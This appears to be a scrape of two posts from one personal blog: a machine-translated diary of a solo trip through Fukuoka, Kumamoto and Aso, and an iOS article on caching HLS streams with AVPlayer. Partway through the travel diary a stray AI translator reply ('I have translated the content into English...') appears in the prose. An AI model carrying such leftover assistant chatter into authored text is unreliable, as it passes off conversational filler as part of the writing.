The skin is crispy, with soup inside, very delicious; due to the language barrier, the waitress was cute and gestured with her hands and belly to indicate 2 portions (1 portion only has 8 pieces, you need 16 pieces to be full), didn’t catch on at the time, so only ordered one portion + Hakata’s famous Meitai.
After eating, I took a stroll through the Nakasu food stalls before it got dark.
It was still early, so I first went to explore the Tenjin Parco department store and planned to come back to see the night view later.
Upstairs, there was Animate, and I got the first draw of the gachapon and got Gojo from Jujutsu Kaisen.
The night view of the Nakasu food stalls gave off a festive atmosphere.
The flashy Japanese advertising signs were eye-catching.
The Nakasu food stalls are roadside eateries on this side, bustling with people; they offer ramen, oden, and grilled food, but nothing particularly caught my attention, so I didn’t go in to eat.
Returned to the hotel to drink and have a late-night snack for rest.
A day of walking in Fukuoka, starting by visiting the nearby Sumiyoshi Shrine after leaving the hotel.
It’s small, so if it’s not nearby, you probably wouldn’t go out of your way to visit.
Passed by Hakata Canal City again on the way to Kushida Shrine.
Saw where the food trucks were parked in the morning, so small and cute.
Kushida Shrine is relatively large, and I also drew a fortune slip. Seeing “suddenly successful in job hunting” gave me hope for my job search.
There were floats displayed for the Hakata Gion Yamakasa Festival, very grand and spectacular.
Continuing the walk in Fukuoka, at noon, walked to Hakata Miyachiku (Japan’s No. 1 Miyazaki Beef Specialty Store Hakata Miyachiku) to taste Miyazaki beef.
This Miyazaki beef steak with beer costs around NT$650, delicious and affordable! The Miyazaki beef was juicy and had no strange smell.
After lunch, I wandered around Tenjin Chikagai and Tenjin Underground Street, bought souvenir cookies and cakes, and also went to the supermarket to try the popular seedless muscat grapes on skewers.
While wandering in Tenjin, I encountered the wild Kumamon Chief.
First, return to the hotel to drop off the souvenirs purchased + rest for a while before heading to Fukuoka Tower + watching a baseball game.
Take a bus from the city to Fukuoka Tower.
[_KKday Japan Kyushu Fukuoka Tower E-Ticket_](https://www.kkday.com/zh-tw/product/18813-japan-fukuoka-tower-e-ticket?cid=19365&ud1=d78e0b15a08a){:target=”_blank”}
Fukuoka Tower’s full mirror design looks beautiful from the outside, I think it’s even more beautiful than the Tokyo Skytree!
(Thanks to a passerby sister for taking the photo)
However, because the tower is located on the outermost side of the city facing the sea, the view from the top is average; not sure how the night view is.
After leaving Fukuoka Tower, slowly walk to the next stop, Fukuoka PayPay Baseball Stadium, with a taste of the sea.
Many people (probably about 70% full), but tickets are still available on-site.
Ticket Buying Episode
When buying tickets, I encountered an elderly man at the counter who was nervous and shaking because he couldn’t understand the language of a foreigner; I also got nervous XD; in a moment of confusion, I chose the last row in the middle of the front viewing platform (with people on both sides), which turned out to be super awkward, having to excuse myself all the way in and out, and the seats were very small, squeezed in between Japanese people, not knowing a word of Japanese, very awkward… Sat through the entire game in a serious and awkward manner.
Ticket price is almost $1,500 TWD, thinking I should have bought the cheapest lousy seat to watch comfortably on my own.
I must say the visual effects of the dome (very close to the baseball field), and the entire large screen animation display are very good.
The traditional cheerleading of the Fukuoka SoftBank Hawks team involves inflating balloons (using a manual pump) in the 7th inning and then releasing them, as for the trash… it’s left unattended and someone will clean it up later.
The home team won 4:2 in the end, more exciting than the CPBL, with pitchers throwing at speeds around 145km per hour, each inning had both offense and defense, very few three-up-three-down innings; but the pace of the game was fast and comfortable to watch.
However, in terms of cheerleading, Taiwan is still richer than Japan.
Indoor fireworks are set off in the dome after a home victory, very cool!
Bought a SoftBank Hawks towel as a souvenir of the visit, also relieving the embarrassment of not being able to enter the Hanshin Tigers Koshien Baseball Stadium last time due to sold-out tickets.
The venue was crowded, but everyone didn’t stand too close and walked slowly. We followed everyone to the nearest Tangren Street subway station because it felt like a long wait for the bus.
Back to the hotel to rest and taste the seedless muscat grapes bought in the afternoon, very sweet, a bit too sweet.
Early in the morning, check out and stroll around the pharmacy near the hotel.
Found nothing special, had a McDonald’s breakfast (McMuffin with egg and iced Americano for $107) and came back to pick up luggage to take the JR to Kumamoto.
Finally said goodbye to this hotel. The lobby had Fukuoka SoftBank Hawks dolls, and outside there was a Taiwanese flag hanging, quite impressive because next door was a friendship convenience store run by Chinese people, with many Chinese customers.
Reserved seats at the station’s electronic machine. Thought it was a bit far, so reserved a seat with luggage.
Follow the instructions to reserve a seat:
If there are any issues, there are station staff available to ask. Originally, there was a train departing in 15 minutes with no seats, so had to buy tickets for another train departing in 45 minutes.
But it was okay not to buy that train. Walking from Hakata Station to the Shinkansen platform heading to Kagoshima (via Kumamoto) took about 10 minutes, a bit far to go around, too rushed.
Managed to use the JR Pass on the last day before it expired.
Originally worried that my 27-inch suitcase (about 69 x 50 x 29 cm) might not fit in the overhead luggage rack and had to buy extra-large luggage with a seat, it is required to buy if it exceeds 160 cm on three sides.
The 27-inch suitcase was a bit tight when placed vertically and could block the neighboring seat; when placed in the luggage rack, it was stable, but still had to lift it up to place it. Buying a window seat was a concern as it might block the aisle when taking or placing luggage; fortunately, a kind Japanese man offered to switch seats to help with the luggage.
Upon arrival in Kumamoto, saw a huge Kumamon bear, then transferred to the JR & subway to the hotel to store luggage (Municipal Gymnasium-mae Station).
Kumamoto is full of Kumamon bears everywhere…
After settling in the hotel, took the tram to Kumamoto Castle (to Torichosuji Station).
You can first visit Sakura no Babajo Castle Saien (forgot to take photos) below to replenish energy. You can buy Kumamoto Castle tickets here. There are not many people here, but when you go up to the entrance of Kumamoto Castle, you will encounter many groups blocking the way.
Ticket options: Kumamoto Castle 800, Kumamoto Castle + the building behind it after buying a ticket (Historical and Cultural Experience Yuyuza) 850, Kumamoto Castle + the building behind it after buying a ticket (Historical and Cultural Experience Yuyuza) + Kumamoto Museum 1,100.
I bought Kumamoto Castle + Yuyuza, thinking it was only an additional 50 yen, but after looking around, it was average. It provided more information on the exhibits inside Kumamoto Castle and earthquake-related artifacts, suitable for photography and experiencing.
Kumamoto Castle’s main tower has been restored and opened to the public in 2023, while other buildings are still under maintenance (you can see the crane).
The new addition is a skywalk directly planned to lead all the way to Kumamoto Castle.
After ascending the main tower, you can see the skywalk you walked along.
Overlooking the square in front of Kumamoto Castle and the historical sites still under continuous maintenance behind.
A model depicting the situation after the earthquake.
A souvenir shop next to the square houses a model of Kumamoto Castle, completing my mission of collecting the three major famous castles!
Returning to the ticket booth, I visited Yuyu-za; inside, there are models of Kumamoto Castle and a Kumamoto Castle made of LEGO, very cool.
Due to the unfavorable weather, I didn’t continue to the museum or Kato Shrine.
Walking back to Toricho-sujin Station, this is where the covered shopping street and the local Tsuruya Department Store of Kumamoto are located. The first floor of the east wing of the department store was completely renovated a few months ago to become Kumamon Square (Kumamon’s office).
While wandering around the shopping street, I happened to come across a public event featuring Kumamon x Traffic Safety and received a Kumamon tote bag.
This area is not very interesting to explore; only Tsutaya Bookstore and the Muji building are worth visiting. When you get off at Kumamoto Station, you can feel that there are many elderly people and few young people. The local Tsuruya Department Store is mostly frequented by elderly people, selling mostly women’s clothing and household items, with fewer items for young people.
I bought some Kumamon merchandise at the Kumamon specialty store in Tsuruya Department Store, then went to the underground street of the department store to buy alcohol and food (dinner + supper) to eat back at the hotel.
The fragrant dew is a Kumamoto local sake recommended by the store, sweet and smooth to drink, but I feel the rice flavor is not strong. Green Rich Hotel Suizenji 2023/09
It is worth mentioning the hotel, in the past, I actually wouldn’t pay much attention to reviews; as long as it’s around 3 stars or above, it’s fine; the soundproofing of this one is not good, and I encountered a whole floor of elementary school graduation trips, with doors opening and closing loudly day and night for two consecutive days, very disturbing.
After checking the detailed reviews on Google/Agoda, I feel somewhat disheartened.
Poor soundproofing seems to be a common problem in old hotels, which I can tolerate (I brought earplugs myself); but as mentioned in previous reviews, the hotel’s WiFi is just a sham.
The WiFi signal is available throughout the hotel, but even with a full signal in the room, the speed is still very slow, websites won’t load, you have to stand by the door to get a normal internet speed, it’s almost like the hotel has no internet.
The price is not attractive either, it’s better to stay in Fukuoka, for the same price, you can stay at APA in Fukuoka.
After this experience, I now know that even for Japanese hotels, it’s important to check the reviews…
Apart from the convenience of being close to the airport, there are no other advantages, and there are no convenience stores nearby (you have to walk for more than 10 minutes to find one).
In the morning, I went straight across to Suizenji Jojuen Garden.
[_KKday Reference Itinerary: Kyushu Kumamoto Day Tour Aso Nakadake Volcano, Kusasenri, Kumamoto Castle, Suizenji Jojuen Garden/All-you-can-eat Seasonal Fruits Departing from Fukuoka Hakata (Chinese, English, Japanese)_](https://www.kkday.com/zh-tw/product/38965?cid=19365&ud1=d78e0b15a08a){:target=”_blank”}
It has a bit of a feeling of the Banqiao Lin Family Garden, very well maintained inside, clear water, a small Mount Fuji, Izumi Shrine, very fat koi, and a cat.
After visiting, take the streetcar to Mizutamachi and head to Kumamon Square (visited yesterday).
Inside, there are Kumamon Chief souvenirs for taking photos, and outside, there is a monitor to see what’s happening inside.
Since it was still early at 11 a.m., before the performance time, I went to find food at the neighboring Tsuruya Department Store.
You can refer to the performance schedule on the Kumamon Square official website (times may vary, but there are usually three performances on Saturdays).
Passing by the Tsuruya Department Store, I also found a Chief sadly playing the piano on the first floor.
I went to B1 to eat the locally famous Hachimitsu Manju, which is a thick wheel cake with either white bean or red bean filling, sweet lovers will love it, and it’s a great breakfast with coffee.
I returned to Kumamon Square just before 11 a.m. to wait for the performance, now there’s no need to draw lots, as long as you enter before the performance, you can go in, if you’re late, you may have to watch the monitor outside, if you have children, you can sit inside.
Before the performance, the order rules will be explained, for example: you cannot pat Kumamon, do not hold the camera too high (it will block the view behind), according to Japanese law, if there are faces, they must be pixelated, and everyone is welcome to upload to SNS.
The performance lasts about 30 minutes. The hostess will help Kumamon speak (all in Japanese). The process is roughly to greet everyone, talk about interesting things in Kumamoto, dance (the above song is very catchy), and say hi to people from different countries (Taiwanese people are the majority here).
Kumamon is very cute and has big, interesting movements.
There are fewer peripheral products sold in the square, and the prices are relatively high, so I didn’t buy anything here.
After watching the performance until close to noon, walk down the shopping street to eat at Shouritei Shinshigai Honten; walking outside the shopping street, suddenly upgraded from a children’s level to a restricted level, with rows of free guides (the other side is Kumamoto Ginza Street as well).
The super thick Jucie pork cutlet rice is special because it comes with their pickled vegetables (shared, self-serve, remember to use the red chopsticks). Other than that, it’s similar to eating Japanese pork cutlet in Taiwan. They will give you a grinding stick and sesame seeds to make the sauce; rice, tea, soup, and cabbage are all free for refills; I ate two bowls of rice in one go and felt very satisfied.
After eating and drinking, continue walking down the shopping street towards Hanabatake Square.
There happened to be an event at the square on Saturday, Food Summit 2003, with food stalls all around, and a stage in the middle for performances.
I bought a glass of sparkling wine and a grilled sausage to sit down and watch the performance. The sausage wasn’t as fragrant and delicious as in Taiwan.
Halfway through eating, something fell from above, which was a bit scary, but it added to the atmosphere. Later, it got too hot, so after eating, I left and went to the Sakuramachi Shopping Center to browse the department store.
Hanabatake Square seems to have events every weekend. You can check before coming. Next week is the Taiwan Festival!
On the top floor, there is a waving Kumamon, and on the second floor, there are also Kumamon merchandise for sale (I think it’s the most complete).
There are also Kumamon performances here, so check the announcement for the schedule.
You can go up the outside stairs all the way to the top floor to find the waving Kumamon. This building also serves as the Kumamoto Bus Center downstairs, where you can buy tickets on the second floor to go to other cities.
There is a large garden on the rooftop, a pool for playing in the water, and children can go up to play.
You can also take the escalator from inside to go up. From the third floor’s Josaien (this Josaien is completely empty), you can find the escalator mentioned online.
Personally, I think the Sakuramachi Shopping Center is better and more enjoyable than the Tsuruya Department Store.
The Sakuramachi Shopping Center is next to the Kumamoto Prefectural Products Hall. In addition to Kumamoto’s specialties, there are also some Kumamon-related products (e.g., Kumamon incense burner XD).
I walked through the Up+Down Shotengai again on the way back.
I bought clothes and miscellaneous items at Muji, and replenished my skincare products at Matsumoto Kiyoshi (for some reason, my Visa card doesn’t work at Matsumoto Kiyoshi, I had issues in Tokyo before, and this time in Kumamoto, I could only use Japanese yen in cash).
When I arrived at the hotel in the evening, I had dinner at Lawson on the way and went to bed early to prepare for visiting Mount Aso tomorrow!
[_KKday Reference Itinerary: [One-person group, daily departure] Japan Kumamoto Day Tour Kumamoto Castle & Mount Aso Volcano Crater & Kusasenri (including Health Buffet All-you-can-eat) Departing from Fukuoka_](https://www.kkday.com/zh-tw/product/21811-kumamoto-tour-josaien-mount-aso-kumamoto-castle-hot-spring-japan?cid=19365&ud1=d78e0b15a08a){:target=”_blank”}
I left early and walked to the bus stop to take the intercity bus to Aso Station; I met Kumamon while waiting for the bus.
We will pass by Aso Airport (I will be there the day after tomorrow Orz).
On the way, when entering the area of Mount Aso, the bus will introduce Mount Aso and play local mountain songs for you to imagine strolling on the grasslands of Mount Aso together.
Upon arrival at Aso Station, there is a statue of Usopp from One Piece outside the station for taking photos (I forgot).
You can buy a one-day pass for Mount Aso at the vending machine here (probably a few hundred yen cheaper) and get the timetable. The one-day pass is only valid for boarding and alighting at the three stations on the timetable. You need to draw a boarding ticket when boarding; it seems that it cannot be used at other stations.
I will take the No. 8 route, the bus to go up the mountain at 10:45.
Time to go up the mountain: about 40 minutes.
Not too many people, almost time to board the bus after a short wait in line, everyone got on; however, for safety reasons on the mountain road, there are no standing seats; and if you are prone to motion sickness, you may need motion sickness medication.
There is also a helicopter experience tour in Aso, where you can directly take a helicopter to see the volcano, those interested can check it out.
Kami-komezuka
When you go up the mountain, you will pass through Kusasenri before reaching the mountain terminal. From the mountain terminal, take another bus for about 10 minutes to reach the summit of the mountain.
Coincidentally, I met a colleague from TSMC next door who was also traveling alone (on a business trip XD). It was both our first time in Aso, so we decided to explore together.
At the mountain terminal, we were too lazy to wait for the bus, so we chose to walk up the mountain (about 15-20 minutes).
Walking to the mountain square, you will reach the fourth crater of Aso Nakadake.
Having a travel companion makes taking photos much easier!
The mountain top is cool and not hot at all, filled with the smell of sulfur. If you have any health conditions like in picture three, consider your physical condition.
We didn’t make it all the way to the Aso Nakadake crater, just went up to take a look and then descended the mountain.
Side Story
After chatting happily all the way down, we didn’t pay attention to the bus direction, and when it was about to leave, we hurried to get on, only to be taken back up again. So, we had to walk back down XD
At the mountain terminal, we made sure to take the No. 8 bus, the No. 8 bus, the No. 8 bus, heading to Aso Station downhill; get off at Kusasenri.
Enjoyed the famous Oka Gyudon, the place was crowded but had plenty of seating, and the food was served quickly, almost no waiting time.
After eating, we strolled around Kusasenri (with a bit of Grand Canyon vibe), where there were horse riding activities.
After eating, we took the same No. 8 bus back to Aso Station, retracing our steps downhill.
When we arrived at Aso Station, the JR train to Aso Shrine (Midori Station) was about to depart in three minutes. If we missed it, we would have to wait another hour. We ran to the station, only to find out that Aso is a small station without electronic payment, so we had to buy tickets from the vending machine in a rush before boarding.
Aso Station has only one platform, so you can board without much hassle. Later, we found out that if you really don’t have time to buy a ticket, you can board first and then purchase one when you get off.
After getting off at Midori Station, it took about 20 minutes of walking to reach Aso Shrine (straight ahead, but a bit far).
On the way, we encountered the wild Kumamon bear.
The shrine is not very big, and we finished paying our respects quickly; part of the shrine was also under maintenance.
After leaving, there was a small shopping street nearby where you could buy some snacks and take a short break.
Thanks to my colleague for treating me to fried beef and potato cakes.
Feel free to ask if you have any questions.
After finishing the visit, we started to walk back slowly. We originally planned to take the 15:47 JR train back to Kumamoto, but when we walked back to Miyagi Station, we found out that it was a reserved seat-only train, with no available unreserved seats and all seats were sold out, so we couldn’t board.
Attached is the timetable, or please check the schedule first; otherwise, you might end up like us, having to wait for an hour for the next 16:35 local JR train back to Kumamoto.
Since there was still plenty of time, we walked back and strolled around Matsumoto on the way. (It’s actually quite far, about 10 minutes).
Finally, we took a last look at the peaceful Aso.
The local train slowly made its way back to Kumamoto, taking about 1 hour and 45 minutes to arrive.
There is a section of the route that zigzags and involves reversing, so don’t worry, you’re on the right train!
Back at Kumamoto Station, we bid farewell to my brother, hoping to meet again someday.
We explored the newly opened AMU PLAZA KUMAMOTO department store at Kumamoto Station (larger and more diverse than the Sakuramachi Shopping Center) and the nearby Higo Market (selling food).
We also found many Kumamon mascots XD.
We had a casual dinner at the food street, tried the Miyazaki chicken (ordinary), toured the entire building, bought some late-night snacks, and Kumamoto-produced strawberry wine (tasted good, planning to bring back to Taiwan) before returning to the hotel.
There was a unique store called “BIWAN Beauty Bay” selling Taiwanese products (even saw some “Gua Gua” snacks XD), and upon checking, it’s opened by Taiwan’s Ayuan Soap.
While researching, I found a cool website - https://kumataiwanlife.com/ - which provides the latest news, events, and fun facts about Kumamoto in Chinese (e.g., Kumamoto’s “OK Band-Aid” is called “LIBATAPE”).
Today, I discovered that the vending machines at the hotel actually sell canned cola, which I couldn’t find in the major convenience stores.
It’s a collaboration between Suntory and Pepsi, not available in Taiwan. It’s made like draft beer but for cola, very fizzy, not too syrupy, unlike regular cola that I usually can’t finish due to being too sweet, but I could finish this draft cola!
After a satisfying meal, we went to bed early, preparing to welcome the last day in Kumamoto (excluding the day of the return flight).
The third day in Kumamoto was quite boring as we had already visited all the attractions. We tried to find some places to explore and buy souvenirs and cosmetics.
I originally planned to go to Shimabara City, but the journey was too far (2 hours and 45 minutes one way), and my JR Pass had expired. I would have to spend more money on a long-distance bus ticket, so I gave up. Oita and Yufuin were also too far, so I gave up. I was too lazy to go to Minami Aso Village, so I left it for next time. Therefore, I wandered around the city and did some shopping, taking it slow.
Early in the morning, I went to the Teramachi Street and visited the Kumamoto Inari Shrine that I didn’t get to visit on the first day.
I walked further back to the Katō Shrine (it’s quite far, about a 20-minute walk with a hilly road).
Turning up the hill, you will reach the Katō Shrine. From there, you can also see the area under repair that I saw from the castle tower on the first day, with many scattered walls waiting to be restored one by one.
It’s small, and half of it is still under repair.
There was a small Kumamoto earthquake donation box. I didn’t offer prayers at the Katō Shrine; instead, I donated to the box.
From here, you can see Kumamoto Castle from the back.
After returning, I went to the Kumamoto City Hall (the 14th floor has a free observation deck). The walk from the Katō Shrine to the city hall is quite far, so you can take a bus.
I originally planned to visit the Kumamoto Art Museum, Craft Museum, etc., but they were all closed on Mondays!
From the 14th floor of the Kumamoto City Hall, you can overlook the entire city, including Kumamoto Castle.
Coming out of the city hall, walk towards the Sakuramachi Shopping Center. You will pass by a pedestrian bridge, which is a great spot for photos, capturing the Kumamoto street and subway.
This intersection is Kumamoto Ginza Street, where there are also free information centers.
I went back to the Sakuramachi Shopping Center for shopping, had another meal of Miyazaki beef with Kumamoto beer, and bought a Kumamon daifuku as a souvenir to bring back to Taiwan (so cute).
I walked back from Shimo-tori to Kami-tori to return to Teramachi Street, stopping by Don Quijote for shopping (the duty-free counter is on the second floor for payment).
After shopping, I decided to head back to the hotel to rest and drop off my things.
Side Note On the tram, I met some cute elderly people from Kumamoto. Pointing to the transparent bag of duty-free instant noodles, they said, “Sukoshi ikkai,” and I replied, “Good! Good!” Then, I showed them the Kumamon daifuku I had just bought and said, “Kawaii ne~” They gave a thumbs up and said, “Kawaii, arigato.” I then said, “I am Taiwanese,” and the elderly lady seemed to greet me in Japanese (my Japanese is too poor to understand, I only caught something about genki). I responded politely, and when I got off, I bid them goodbye.
Upon returning to the hotel and opening the curtains for the first time, there was the Mizukami Temple basin behind; the scenery was actually quite nice, and you could hear insects at night.
After resting for a while in the afternoon with nowhere else to go, I randomly visited some spots on the map.
Walked to the front of the Kumamoto Prefectural Government first to find the Luffy statue.
Took a bus and walked to Kengun Shrine; a small shrine, almost no one there as it was close to closing time.
There was no direct bus here, had to walk a short distance (about 15 minutes); after leaving the shrine, continued walking towards “Kumamoto Zoo” (about 20-30 minutes) to find the Chopper statue.
Saw a Sergeant Frog manhole cover on the way (seems to be from a previous event).
Found the Chopper statue at the entrance of the zoo.
Checked beforehand that Kumamoto Zoo seemed quite boring, so didn’t specifically plan to go in; it was already closed in the evening.
Side Story Met a Taiwanese family at the zoo entrance who wanted to take photos, so I helped them; the next day at the airport, I met them again and took another photo with them and the airplane. The younger brother called me the “photo-taking brother” XD.
Continued walking on the map to the Mizukami Temple basin’s Egawa Lake Park, took a look on the way; discovered it was just a riverside park for locals to exercise, so took a bus directly back to the hotel (or the bus terminal).
Had dinner at an izakaya near Shin-Mizukami Station.
Dined with former colleagues (from a tech company, later worked at Books.com and appeared on the cover of Line News, a.k.a. Books.com Goddess Irene Yu).
It was so touching to have dinner with familiar people in a different place, especially since I had been quite withdrawn for several days (not understanding Japanese, hardly speaking), and in the end, I even received a Beppu souvenir 😭.
Ate too quickly, only remembered the chicken wings were delicious, also tried the horse meat skewers (Kumamoto horse sashimi is famous, but I was too scared to try); the landlady was very friendly, but the menu was all in Japanese, and the font was hard to decipher with translation software, so I could only guess XD.
After dinner, walked back to the hotel (about 15 minutes), then strolled through the streets of Kumamoto, bought ice cream and sweet sake at Lawson and FamilyMart (thought it was sake, but turns out sweet sake is a nourishing summer treat).
Also bought breakfast for the next morning (melon bread + juice) and this fruit juice with pulp from FamilyMart (melon, strawberry…) was really delicious, I almost always bought it when I saw it, the pulp inside was sweet and tasty.
I have translated the content into English as per your instructions. Let me know if you need any further assistance.
Upon disembarking the plane, I noticed the person in front of me was wearing a helmet. Are they riding a motorcycle to take a flight? 🤣
Arrived at Taoyuan Airport, heading home!
When picking up luggage, there was a slight delay possibly due to early check-in; had to wait a bit before it arrived. Also tested the Airtag locating feature, it made a sound when the luggage was close!
Back in Taiwan, saw Kumamon on the road again XD (seems to be a new card promotion for E.SUN Bank).
Bus Riding Rules in Japan: Don’t Worry About Taking the Bus! Complete Guide
That concludes the entire record of my 10-day solo trip to Kyushu, with summaries/Retro written earlier. Thank you for reading.
[Japan JR PASS | Kyushu Area Rail Pass | Northern Kyushu & Southern Kyushu & All Kyushu | E-Ticket](https://www.kkday.com/zh-tw/product/3494-jr-kyushu-rail-pass?cid=19365&ud1=d78e0b15a08a){:target=”_blank”} |
[Nagasaki, Japan | Huis Ten Bosch Ticket](https://www.kkday.com/zh-tw/product/3988-japan-nagasaki-huis-ten-bosch-ticket?cid=19365&ud1=d78e0b15a08a){:target=”_blank”} |
[Nagasaki Day Tour | Glover Garden, Oura Tenshudo & Nagasaki Atomic Bomb Museum, Peace Park & Inasayama Night View (One of the World’s Top Three Night Views/Includes Round-Trip Cable Car) | Optional Huis Ten Bosch Fireworks Plan | Departing from Fukuoka/Chinese Group](https://www.kkday.com/zh-tw/product/152195-nagasaki-tour-saga-yutoku-inari-shrine-fukuoka-japan?cid=19365&ud1=d78e0b15a08a){:target=”_blank”} |
Feel free to contact me for any questions or feedback.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
How to achieve caching while playing m3u8 streaming video files using AVPlayer
photo by Mihis Alex
I have open-sourced my previous implementation, and those in need can use it directly.
HTTP Live Streaming (HLS) is a streaming media network transmission protocol based on HTTP proposed by Apple.
For example, when playing music, in a non-streaming situation, we use mp3 as the music file. The larger the file, the longer it takes to download completely before it can be played. HLS, on the other hand, splits a file into multiple small files, playing as it reads. So, once the first segment is received, playback can start without downloading the entire file!
The .m3u8
file records the bitrate, playback order, time, and other information of these segmented .ts
small files. It can also provide encryption and decryption protection, low-latency live streaming, etc.
Example of an .m3u8
file (aviciiwakemeup.m3u8):
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+
#EXTM3U
+#EXT-X-VERSION:3
+#EXT-X-ALLOW-CACHE:YES
+#EXT-X-TARGETDURATION:10
+#EXT-X-MEDIA-SEQUENCE:0
+#EXTINF:9.900411,
+aviciiwakemeup–00001.ts
+#EXTINF:9.900400,
+aviciiwakemeup–00002.ts
+#EXTINF:9.900411,
+aviciiwakemeup–00003.ts
+#EXTINF:9.900411,
+.
+.
+.
+#EXTINF:6.269389,
+aviciiwakemeup-00028.ts
+#EXT-X-ENDLIST
+
*EXT-X-ALLOW-CACHE has been deprecated in iOS≥ 8/Protocol Ver.7. Whether this line is present or not is meaningless.
For a streaming media service, Cache is extremely important; because each audio file can range from a few MBs to several GBs. If every replay requires fetching the file from the server again, it would be very taxing on the server’s loading, and the traffic costs are \(\). Having a Cache layer can save a lot of money for the service, and users won’t have to waste bandwidth and time re-downloading; it’s a win-win mechanism (but remember to set limits/clear periodically to avoid filling up the user’s device).
In the past, when not dealing with streaming, handling mp3/mp4 was straightforward: download the file to the device before playing, and start playback only after the download is complete. Since the file has to be fully downloaded before playback anyway, we might as well use URLSession to download the file and then feed the local file path (file://) to AVPlayer for playback. Alternatively, the formal way is to use AVAssetResourceLoaderDelegate to cache the downloaded data in the delegate methods.
For streaming, the idea is also quite straightforward: first read the .m3u8
file, then parse the information inside, and cache each .ts
file. However, implementing this turned out to be more complicated than I imagined, which is why this article exists!
For playback, we still use iOS AVFoundation’s AVPlayer directly. There is no difference in operation between streaming and non-streaming files.
Example:
1
+2
+3
+
let url: URL = URL(string: "https://zhgchg.li/aviciiwakemeup.m3u8")
+var player: AVPlayer = AVPlayer(url: url)
+player.play()
+
We decided to revert to using mp3 files, so we can directly use AVAssetResourceLoaderDelegate
for implementation. For detailed implementation, refer to “AVPlayer Streaming Cache Implementation”.
Several solutions to achieve our goal and the issues encountered during implementation.
The first thought was to follow the same approach as with mp3/mp4 files: use AVAssetResourceLoaderDelegate to cache .ts
files in the delegate methods.
Unfortunately, this approach doesn’t work because we can’t intercept the download request information for .ts
files in the delegate. This is confirmed in this Q&A and the official documentation.
For AVAssetResourceLoaderDelegate implementation, refer to “AVPlayer Streaming Cache Implementation”.
URLProtocol is a method I recently learned. All requests based on the URL Loading System
(URLSession, API calls, image downloads, etc.) can be intercepted to modify the Request and Response before returning them, making it seem like nothing happened. For more on URLProtocol, refer to this article.
Using this method, we planned to intercept AVFoundation AVPlayer’s requests for .m3u8
and .ts
files. If there is a local cache, return the cached data directly; otherwise, send the request out. This would achieve our goal.
Again, unfortunately, this approach doesn’t work either because AVFoundation AVPlayer’s requests are not on the URL Loading System
, so we can’t intercept them. *Some say it works on the simulator but not on the actual device
Based on Solution 2.1, a brute-force method: if I change the request URL to a custom scheme (e.g., streetVoiceCache://), AVFoundation won’t be able to handle this request and will throw it out, allowing our URLProtocol to intercept and do what we want.
1
+2
+3
+
let url: URL = URL(string: "streetVoiceCache://zhgchg.li/aviciiwakemeup.m3u8?originScheme=https")
+var player: AVPlayer = AVPlayer(url: url)
+player.play()
+
URLProtocol will intercept streetVoiceCache://zhgchg.li/aviciiwakemeup.m3u8?originSchme=https
, at this point, we just need to restore it to the original URL, then send a URLSession request to fetch the data and handle the cache ourselves here; the .ts
file requests in the m3u8 will also be intercepted by URLProtocol, and similarly, we can handle the cache ourselves here.
Everything seemed perfect, but when I excitedly Build-Run the APP, Apple slapped me in the face:
Error: 12881 “CoreMediaErrorDomain custom url not redirect”
It doesn’t accept the Response Data for the .ts
file Request I provided. I can only use the urlProtocol:wasRedirectedTo
method to redirect to the original Https request to play normally, even if I download the .ts
file locally and then redirectTo that file:// file; it still doesn’t accept it. Checking the official forum revealed that this approach is not allowed; .m3u8
can only originate from Http/Https (so even if you put the entire .m3u8
and all segmented files .ts
locally, you can’t use file:// to play with AVPlayer), and .ts
cannot use URLProtocol to provide Data.
fxxk…
Implementation is the same as Solution 2.2, feeding AVPlayer a custom Scheme to enter AVAssetResourceLoaderDelegate; then we handle it ourselves.
Same result as 2.2:
Error: 12881 “CoreMediaErrorDomain custom url not redirect”
Official forum gave the same answer.
It can be used for decryption processing (refer to this article or this example) but still cannot achieve Cache functionality.
This method is the most commonly suggested solution when looking for ways to handle HLS Cache; it involves setting up an HTTP Server on the APP to act as a Reverse Proxy Server.
The principle is simple, set up an HTTP Server on the APP, assuming it’s on port 8080, the URL would be http://127.0.0.1:8080/
; then we can handle the incoming Requests and provide Responses.
Applying this to our case, change the request URL to: http://127.0.0.1:8080/aviciiwakemeup.m3u8?origin=http://zhgchg.li/
In the HTTP Server’s Handler, intercept and handle *.m3u8
, when a Request comes in, it will enter our Handler, and we can do whatever we want, control what Data to Response, and the .ts
files will also come in; here we can implement our desired Cache mechanism.
For AVPlayer, it’s just a standard http://.m3u8 streaming audio file, so there won’t be any issues.
For a complete implementation example, refer to:
Because I also referred to this example, I also used GCDWebServer for the Local HTTP Server part. Additionally, there is a newer Telegraph available for use. ( CocoaHttpServer hasn’t been updated for a long time, so it’s not recommended anymore)
Looks good! But there’s a problem:
Our service is music streaming rather than a video playback platform. In many cases, users switch music in the background; will the Local HTTP Server still be there then?
GCDWebServer’s documentation states that it will automatically disconnect when entering the background and automatically resume when returning to the foreground. However, you can disable this mechanism by setting the parameter GCDWebServerOption_AutomaticallySuspendInBackground:false
.
But in practice, if no requests are sent for a period of time, the server will still disconnect (and the status will be incorrect, still showing as isRunning), which feels like it was killed by the system. After delving into the HTTP Server approach, I found that the underlying layer is based on sockets. According to the official documentation on socket services, this issue cannot be resolved. The system will suspend it when there are no new connections in the background.
*There are some convoluted methods found online… like sending a long request or continuously sending empty requests to ensure the server is not suspended by the system in the background.
All of the above applies to the app being in the background. When in the foreground, the server is very stable and won’t be suspended due to idleness, so there’s no such issue!
Since it relies on other services, even if there are no issues in the development environment, it is recommended to implement a rollback mechanism in actual applications (AVPlayer.AVPlayerItemFailedToPlayToEndTimeErrorKey notification); otherwise, if the service crashes, the user will be stuck.
So it's not perfect...
Our .m3u8/.ts
files’ Response Headers all provide Cache-Control
, Age
, eTag
… these HTTP Client Cache information. Our website’s cache mechanism works perfectly on Chrome, and the new official Protocol Extension for Low-Latency HLS preliminary specification also mentions that cache-control headers can be set for caching.
But in practice, AVFoundation AVPlayer does not have any HTTP Client Caching effect, so this route is also a dead end! Pure wishful thinking.
Implement audio file parsing, caching, encoding, and playback functionality yourself.
This is too hardcore, requiring very deep technical skills and a lot of time; not researched.
Here is an open-source player for reference: FreeStreamer. If you really choose this solution, it’s better to stand on the shoulders of giants and directly use third-party libraries.
Same as Solution 5, too hardcore, requiring very deep technical skills and a lot of time; not researched.
Not researched, but indeed feasible. However, it sounds complicated, having to process the downloaded .ts
files, convert them individually to .mp3 or .mp4 files, and then play them in order or compress them into one file or something. It just doesn’t sound easy to do.
